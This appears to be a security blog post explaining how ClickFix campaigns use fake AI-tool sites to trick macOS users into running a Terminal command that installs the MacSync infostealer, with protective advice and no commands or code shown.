Light bulb Limited Spots Available: Secure Your Lifetime Subscription on Gumroad!

Mar 17, 2026 · 5 min read

That Free AI Tool for Mac Is Stealing Your Passwords—One Terminal Command Is All It Takes

Three ClickFix campaigns are tricking macOS users into running a single Terminal command that deploys the MacSync infostealer—harvesting credentials, keychains, and crypto wallets.

macOS Users Are Not as Safe as They Think

The belief that Macs don't get malware has never been accurate, but a new wave of attacks makes it especially dangerous. Since November 2025, researchers at Sophos and Jamf Threat Labs have tracked three coordinated campaigns targeting macOS users with a technique called ClickFix. The campaigns use fake AI tools as bait, exploit users' own trust in their machines, and require no vulnerability to pull off. All an attacker needs is for you to open Terminal and paste a single command.

The payload is MacSync, an infostealer built specifically for macOS. Once installed, it harvests saved passwords, keychain databases, files, and cryptocurrency wallet seed phrases. The attacker ends up with the keys to virtually everything on your machine.

macOS Terminal window showing a malicious command being pasted as part of a ClickFix social engineering attack

How ClickFix Social Engineering Works

ClickFix is not a technical exploit. It is a social engineering technique that bypasses macOS security entirely by convincing the user to become the attacker. As Sophos researchers note, the method "relies entirely on user interaction—usually copying and executing commands."

The attack follows a simple script. You land on a fake website—often through a sponsored search result or a convincing advertisement—that displays a professional looking page for an AI productivity tool. The page instructs you to verify your system or complete an installation step by opening Terminal and pasting a command it provides. The command looks plausible. It might resemble a package installation or a system configuration task that developers run routinely. You paste it, press Enter, and enter your password when prompted. The malware is now running with your permissions.

macOS Gatekeeper and notarization requirements are designed to block unsigned software from running automatically. ClickFix sidesteps all of that because the user willingly executes the payload in a privileged environment. There is no unsigned app to block. There is only a shell command that the operating system has no reason to distrust.

Three Campaigns, Three Fake AI Lures

Researchers documented three distinct campaigns, each targeting a different audience with a different fake AI product:

  • November 2025 — OpenAI Atlas: Attackers purchased Google sponsored search ads for a fake browser called "OpenAI Atlas." Users searching for AI tools encountered the ad, visited the fake site, and were walked through a Terminal based installation process that deployed MacSync.
  • December 2025 — Mac Cleanup via Malvertising: This campaign targeted people searching for "how to clean up your Mac." Ads led to pages that displayed what appeared to be real ChatGPT conversations recommending a cleanup tool. The installation instructions, again delivered through Terminal, were the malicious payload.
  • February 2026 — MacSync v2, Global Reach: A new variant of the campaign expanded its targeting to users in Belgium, India, North America, and South America. This version introduced significant technical upgrades designed to evade modern security tools.

The use of OpenAI branding is deliberate. The name carries credibility, and users eager to try the latest AI tools are less likely to scrutinize an installation process that feels routine.

Under the Hood: AppleScript, In Memory Execution, and Evasion

The February 2026 variant introduced capabilities that go well beyond a simple dropper. The shell script executed in Terminal prompts the user for their system password, which grants the attacker user level permissions. MacSync then launches under those permissions, meaning it can access anything the logged in user can access.

The new variant adds two techniques that make detection significantly harder:

  • Dynamic AppleScript payloads: Instead of hardcoding malicious logic into the initial script, the malware fetches AppleScript instructions from a remote server at runtime. This means the payload can change between infections, making signature based detection less reliable.
  • In memory execution: The malicious code runs entirely in memory without writing a persistent executable to disk. Behavioral detection tools that look for suspicious files being written or launched from unusual locations will not see an obvious trigger.

Together, these techniques represent a meaningful step up in operational sophistication. The attackers are actively adapting to the defenses that security teams deploy on managed macOS fleets.

What MacSync Actually Steals

MacSync is purpose built to extract high value credentials and financial assets from macOS. Once running, it targets:

  • Saved credentials: Usernames and passwords stored in browsers, including autofill data for banking, work, and personal accounts
  • Keychain databases: The macOS Keychain stores passwords, certificates, and secure notes for the entire system—MacSync exfiltrates the entire database
  • Files: Documents, configuration files, and anything else accessible to the user account
  • Cryptocurrency wallet seed phrases: Browser extension wallets and desktop clients store recovery phrases that give complete and irreversible access to crypto holdings

The Keychain exfiltration is particularly significant. A single macOS Keychain can contain decades of stored passwords across hundreds of services. An attacker who obtains your Keychain database has a near complete picture of your digital life, and depending on your password reuse habits, may be able to access accounts you have not touched in years.

How to Protect Yourself

ClickFix works because it engineers a moment of trust at exactly the right time. Defending against it requires building habits that interrupt that trust before you act:

  • Never paste commands from websites into Terminal. No legitimate software installation requires you to open Terminal and paste a command from a webpage. If a site asks you to do this, treat it as an attack.
  • Be skeptical of sponsored search results for software. All three campaigns used paid ads or malvertising to reach victims. Download software only from verified official sources, not from links in search ads.
  • Do not enter your system password when prompted by scripts you did not write. A shell script asking for your macOS password is requesting elevated access. If you did not deliberately initiate a trusted installation, stop immediately.
  • Use a password manager that does not rely solely on the system Keychain. If your Keychain is compromised, a standalone password manager with its own master password provides an additional layer of separation.
  • Enable macOS lockdown features and keep the operating system updated. While ClickFix bypasses Gatekeeper by design, other system hardening reduces the attack surface available to malware once it is running.
  • If you think you may have been compromised, revoke and rotate credentials immediately. Prioritize banking, email, and any accounts linked to cryptocurrency. Assume your Keychain contents are in attacker hands and act accordingly.

The researchers who discovered and documented these campaigns—Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey at Sophos, alongside the team at Jamf Threat Labs—have made detection indicators available to enterprise security teams. If you manage a macOS fleet, their published indicators of compromise are worth reviewing and deploying immediately.